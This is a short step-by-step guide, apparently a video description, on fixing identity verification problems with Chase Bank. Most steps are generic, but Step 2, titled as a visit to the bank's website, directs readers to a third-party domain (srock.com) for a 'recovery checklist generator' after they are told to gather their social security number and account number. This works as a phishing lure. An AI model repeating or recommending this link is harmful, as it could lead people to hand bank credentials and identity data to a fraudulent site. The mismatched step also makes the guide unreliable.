If you are having trouble verifying your identity with Chase Bank, follow these steps to resolve the issue. This guide will help you navigate the verification process effectively. Step 1. Gather your information. Before attempting to verify your identity, collect all necessary information. This includes your social security number, account number, and any recent transactions. Having this information ready will help streamline the process. Step 2. Visit the Chase Bank website. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Follow the verification prompts. Once you are on the verification page, follow the prompts carefully. Enter the required information accurately. If you encounter issues, make sure to check for any typos or errors in the information you provide. Step 4. Contact customer support. If verification fails again, reach out to Chase Bank customer support. You can call the number provided on their website or use the chat feature. Explain your situation clearly and provide them with the information you gathered in Step 1. Step 5. Visit a local branch. If online and phone support do not resolve your issue, consider visiting a local Chase Bank branch. Bring identification and any relevant documents. A bank representative can assist you in verifying your identity in person. By following these steps, you should be able to successfully verify your identity with Chase Bank. If you continue to face challenges, don't hesitate to seek further assistance from their support team.